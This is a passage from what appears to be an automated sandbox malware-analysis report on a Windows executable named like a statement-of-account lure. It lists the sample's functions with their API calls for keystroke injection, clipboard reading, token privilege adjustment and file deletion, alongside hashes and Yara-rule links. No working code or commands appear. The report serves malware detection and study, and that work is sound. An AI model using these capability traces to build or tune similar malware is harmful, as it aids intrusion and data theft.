                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 3850602802-328681919
                                      • Opcode ID: 10c305c62d6c52ae6143bab8cd4edeb1d7669067e302ce3399d32c188842044e
                                      • Instruction ID: 66e84816f23262fce3577929ecda68bb2275bd881f4e42cfc7a57798d0943d4f
                                      • Opcode Fuzzy Hash: 10c305c62d6c52ae6143bab8cd4edeb1d7669067e302ce3399d32c188842044e
                                      • Instruction Fuzzy Hash: 6312CF71604209ABEF248F68DD59FAE7BB8FF85320F104629F915DB2D0EB788941CB51
                                      Function 0094EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,00000000), ref: 0094EB4A
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009A3AEA
                                      • IsIconic.USER32(000000FF), ref: 009A3AF3
                                      • ShowWindow.USER32(000000FF,00000009), ref: 009A3B00
                                      • SetForegroundWindow.USER32(000000FF), ref: 009A3B0A
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009A3B20
                                      • GetCurrentThreadId.KERNEL32 ref: 009A3B27
                                      • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 009A3B33
                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 009A3B44
                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 009A3B4C
                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 009A3B54
                                      • SetForegroundWindow.USER32(000000FF), ref: 009A3B57
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009A3B6C
                                      • keybd_event.USER32(00000012,00000000), ref: 009A3B77
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009A3B81
                                      • keybd_event.USER32(00000012,00000000), ref: 009A3B86
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009A3B8F
                                      • keybd_event.USER32(00000012,00000000), ref: 009A3B94
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009A3B9E
                                      • keybd_event.USER32(00000012,00000000), ref: 009A3BA3
                                      • SetForegroundWindow.USER32(000000FF), ref: 009A3BA6
                                      • AttachThreadInput.USER32(000000FF,?,00000000), ref: 009A3BCD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 4125248594-2988720461
                                      • Opcode ID: 33446e60ec7232894d768c61af42923a55ccde4cd143391bd01c9b36a10dc804
                                      • Instruction ID: acbca34896fe0f72f09e8b9ee1aeb2cc2ab04f50588af87f37caffabf902bfa0
                                      • Opcode Fuzzy Hash: 33446e60ec7232894d768c61af42923a55ccde4cd143391bd01c9b36a10dc804
                                      • Instruction Fuzzy Hash: 4F31A671A54318BBEB305B759D49F7F7E6CEB44B60F108125FA05EA1D0EAB05D00AEB0
                                      Function 009760DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00976EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00975FA6,?), ref: 00976ED8
                                        • Part of subcall function 00976EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00975FA6,?), ref: 00976EF1
                                        • Part of subcall function 0097725E: __wsplitpath.LIBCMT ref: 0097727B
                                        • Part of subcall function 0097725E: __wsplitpath.LIBCMT ref: 0097728E
                                        • Part of subcall function 009772CB: GetFileAttributesW.KERNEL32(?,00976019), ref: 009772CC
                                      • _wcscat.LIBCMT ref: 00976149
                                      • _wcscat.LIBCMT ref: 00976167
                                      • __wsplitpath.LIBCMT ref: 0097618E
                                      • FindFirstFileW.KERNEL32(?,?), ref: 009761A4
                                      • _wcscpy.LIBCMT ref: 00976209
                                      • _wcscat.LIBCMT ref: 0097621C
                                      • _wcscat.LIBCMT ref: 0097622F
                                      • lstrcmpiW.KERNEL32(?,?), ref: 0097625D
                                      • DeleteFileW.KERNEL32(?), ref: 0097626E
                                      • MoveFileW.KERNEL32(?,?), ref: 00976289
                                      • MoveFileW.KERNEL32(?,?), ref: 00976298
                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 009762AD
                                      • DeleteFileW.KERNEL32(?), ref: 009762BE
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 009762E1
                                      • FindClose.KERNEL32(00000000), ref: 009762FD
                                      • FindClose.KERNEL32(00000000), ref: 0097630B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                      • String ID: \*.*$p1#v`K$v
                                      • API String ID: 1917200108-1732502266
                                      • Opcode ID: 1266841762c444b04786acd6af61ad2582b91d95cbc495faf056ae187c2c8ff9
                                      • Instruction ID: c72d304206f3bd06e1695cb22cd837cdb7223e34fba2beb9874eb86ea383fd16
                                      • Opcode Fuzzy Hash: 1266841762c444b04786acd6af61ad2582b91d95cbc495faf056ae187c2c8ff9
                                      • Instruction Fuzzy Hash: 18514F7280911C6ACB21EB91CC44EEF77BCAF45310F0545E6E599E2142EB3697498FA4
                                      Function 00986B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32(009CDC00), ref: 00986B36
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00986B44
                                      • GetClipboardData.USER32(0000000D), ref: 00986B4C
                                      • CloseClipboard.USER32 ref: 00986B58
                                      • GlobalLock.KERNEL32(00000000), ref: 00986B74
                                      • CloseClipboard.USER32 ref: 00986B7E
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00986B93
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00986BA0
                                      • GetClipboardData.USER32(00000001), ref: 00986BA8
                                      • GlobalLock.KERNEL32(00000000), ref: 00986BB5
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00986BE9
                                      • CloseClipboard.USER32 ref: 00986CF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                      • String ID:
                                      • API String ID: 3222323430-0
                                      • Opcode ID: 349aabc8f795c044e394f9645ea5c35a53fd220d242a5b97fad6869532a1acbc
                                      • Instruction ID: 93951063f7742b76d82e79db33b05357430ccb35b2e9d150efa734d1bdf233ce
                                      • Opcode Fuzzy Hash: 349aabc8f795c044e394f9645ea5c35a53fd220d242a5b97fad6869532a1acbc
                                      • Instruction Fuzzy Hash: CA51A271209201ABD300FF64DE56F6E77A8EF88B10F004529F696DA2E1EF70D905DB62
                                      Function 0096ACC5 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0096B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0096B180
                                        • Part of subcall function 0096B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0096B1AD
                                        • Part of subcall function 0096B134: GetLastError.KERNEL32 ref: 0096B1BA
                                      • _memset.LIBCMT ref: 0096AD08
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0096AD5A
                                      • CloseHandle.KERNEL32(?), ref: 0096AD6B
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0096AD82
                                      • GetProcessWindowStation.USER32 ref: 0096AD9B
                                      • SetProcessWindowStation.USER32(00000000), ref: 0096ADA5
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0096ADBF
                                        • Part of subcall function 0096AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0096ACC0), ref: 0096AB99
                                        • Part of subcall function 0096AB84: CloseHandle.KERNEL32(?,?,0096ACC0), ref: 0096ABAB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                      • String ID: $default$winsta0
                                      • API String ID: 2063423040-1027155976
                                      • Opcode ID: dd107c03e80271a69483c50ac197428642386d097a674829ceaa6527b39a7d73
                                      • Instruction ID: 12dc2c20edd671e3e89c8bb25bf5655938c29a16f4cbdbb3f190ddfb4681b7f7
                                      • Opcode Fuzzy Hash: dd107c03e80271a69483c50ac197428642386d097a674829ceaa6527b39a7d73
                                      • Instruction Fuzzy Hash: 51816E71801209AFDF129FA4DD49AEE7BBCEF08314F048119F914B61A1E7368E55DF62
                                      Function 0097F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0097F62B
                                      • FindClose.KERNEL32(00000000), ref: 0097F67F
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0097F6A4
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0097F6BB
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0097F6E2
                                      • __swprintf.LIBCMT ref: 0097F72E
                                      • __swprintf.LIBCMT ref: 0097F767
                                      • __swprintf.LIBCMT ref: 0097F7BB
                                        • Part of subcall function 0095172B: __woutput_l.LIBCMT ref: 00951784
                                      • __swprintf.LIBCMT ref: 0097F809
                                      • __swprintf.LIBCMT ref: 0097F858
                                      • __swprintf.LIBCMT ref: 0097F8A7
                                      • __swprintf.LIBCMT ref: 0097F8F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                      • API String ID: 835046349-2428617273
                                      • Opcode ID: 96ae6e1780c3f0b2838b4a204bfb855a2894588f43326427ca8f2ff3eee79427
                                      • Instruction ID: 4d719333902527c3c3bdc8ffb1bcec6bdf7a64ae8afbf4ca33741d7df919f3fb
                                      • Opcode Fuzzy Hash: 96ae6e1780c3f0b2838b4a204bfb855a2894588f43326427ca8f2ff3eee79427
                                      • Instruction Fuzzy Hash: AAA12FB2408344ABC314EBA5C895EAFB7ECBFD8704F40492EF59593191EB34D949CB62
                                      Function 00981B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00981B50
                                      • _wcscmp.LIBCMT ref: 00981B65
                                      • _wcscmp.LIBCMT ref: 00981B7C
                                      • GetFileAttributesW.KERNEL32(?), ref: 00981B8E
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00981BA8
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00981BC0
                                      • FindClose.KERNEL32(00000000), ref: 00981BCB
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00981BE7
                                      • _wcscmp.LIBCMT ref: 00981C0E
                                      • _wcscmp.LIBCMT ref: 00981C25
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00981C37
                                      • SetCurrentDirectoryW.KERNEL32(009E39FC), ref: 00981C55
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00981C5F
                                      • FindClose.KERNEL32(00000000), ref: 00981C6C
                                      • FindClose.KERNEL32(00000000), ref: 00981C7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1803514871-438819550
                                      • Opcode ID: 1f9eb40be3488a1ddc7a96a83329d950c1795653c39ff30920cb8c5bc71579d0
                                      • Instruction ID: 79346d9864a12873f5973704c3879c3fa14f6ec076473fa292c075316ed4d1b4
                                      • Opcode Fuzzy Hash: 1f9eb40be3488a1ddc7a96a83329d950c1795653c39ff30920cb8c5bc71579d0
                                      • Instruction Fuzzy Hash: 0A31F33250521AABCF14EFA5DC48BEE77ACAF45324F0042A5F911E3190EB70DE868B64
                                      Function 0099F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • DragQueryPoint.SHELL32(?,?), ref: 0099F37A
                                        • Part of subcall function 0099D7DE: ClientToScreen.USER32(?,?), ref: 0099D807
                                        • Part of subcall function 0099D7DE: GetWindowRect.USER32(?,?), ref: 0099D87D
                                        • Part of subcall function 0099D7DE: PtInRect.USER32(?,?,0099ED5A), ref: 0099D88D
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0099F3E3
                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0099F3EE
                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0099F411
                                      • _wcscat.LIBCMT ref: 0099F441
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0099F458
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0099F471
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0099F488
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0099F4AA
                                      • DragFinish.SHELL32(?), ref: 0099F4B1
                                      • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0099F59C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                      • API String ID: 2166380349-3440237614
                                      • Opcode ID: 2ff1d54d01c355907e5e83fa319520580b686fb13e7f44becea94294a5973beb
                                      • Instruction ID: 1c7dfc41be1d4c6d682b55166f0a289598feb3f3ef093ae53a32678f524ca521
                                      • Opcode Fuzzy Hash: 2ff1d54d01c355907e5e83fa319520580b686fb13e7f44becea94294a5973beb
                                      • Instruction Fuzzy Hash: CF6139B1508301AFC711EF64DC85EABBBF8BFC9714F400A2EF595921A1DB709A09CB52
                                      Function 00981C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00981CAB
                                      • _wcscmp.LIBCMT ref: 00981CC0
                                      • _wcscmp.LIBCMT ref: 00981CD7
                                        • Part of subcall function 00976BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00976BEF
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00981D06
                                      • FindClose.KERNEL32(00000000), ref: 00981D11
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00981D2D
                                      • _wcscmp.LIBCMT ref: 00981D54
                                      • _wcscmp.LIBCMT ref: 00981D6B
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00981D7D
                                      • SetCurrentDirectoryW.KERNEL32(009E39FC), ref: 00981D9B
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00981DA5
                                      • FindClose.KERNEL32(00000000), ref: 00981DB2
                                      • FindClose.KERNEL32(00000000), ref: 00981DC2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 1824444939-438819550
                                      • Opcode ID: f90a99e05ddd4a0f2b936a3002d9800a31accfc3e26a02ca896b9e038a4edb1d
                                      • Instruction ID: 39eb689a55ae54bd566bf2b53c025d37f988d6a74f30de6475e63f2ff0a49ac0
                                      • Opcode Fuzzy Hash: f90a99e05ddd4a0f2b936a3002d9800a31accfc3e26a02ca896b9e038a4edb1d
                                      • Instruction Fuzzy Hash: 7E31163250561A6ACF14FFA4DC48FEE37ACAF45324F104691F800A32D1EB70DE468B54
                                      Function 0098091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 009809DF
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 009809EF
                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009809FB
                                      • __wsplitpath.LIBCMT ref: 00980A59
                                      • _wcscat.LIBCMT ref: 00980A71
                                      • _wcscat.LIBCMT ref: 00980A83
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00980A98
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00980AAC
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00980ADE
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00980AFF
                                      • _wcscpy.LIBCMT ref: 00980B0B
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00980B4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                      • String ID: *.*
                                      • API String ID: 3566783562-438819550
                                      • Opcode ID: aa42f2beeec729950761e20a1029d68617cc4b58c8406f8cefe36c0e269c54cd
                                      • Instruction ID: 0ce30476de1f8dc157163d7ce01b5e893a53b74e485c9bf12504ac64ac4e9ac0
                                      • Opcode Fuzzy Hash: aa42f2beeec729950761e20a1029d68617cc4b58c8406f8cefe36c0e269c54cd
                                      • Instruction Fuzzy Hash: D7613A725083059FD710EF60C885A9EB3E8FFC9314F04895AF99987251EB35E949CB92
                                      Function 0099EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0099EF3B
                                      • GetFocus.USER32 ref: 0099EF4B
                                      • GetDlgCtrlID.USER32(00000000), ref: 0099EF56
                                      • _memset.LIBCMT ref: 0099F081
                                      • GetMenuItemInfoW.USER32 ref: 0099F0AC
                                      • GetMenuItemCount.USER32(00000000), ref: 0099F0CC
                                      • GetMenuItemID.USER32(?,00000000), ref: 0099F0DF
                                      • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0099F113
                                      • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0099F15B
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0099F193
                                      • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0099F1C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                      • String ID: 0
                                      • API String ID: 3616455698-4108050209
                                      • Opcode ID: 5c70a6cdd06a0dc922d49c25a284a3e36c0fe253e93d18062e17fb500dc3271e
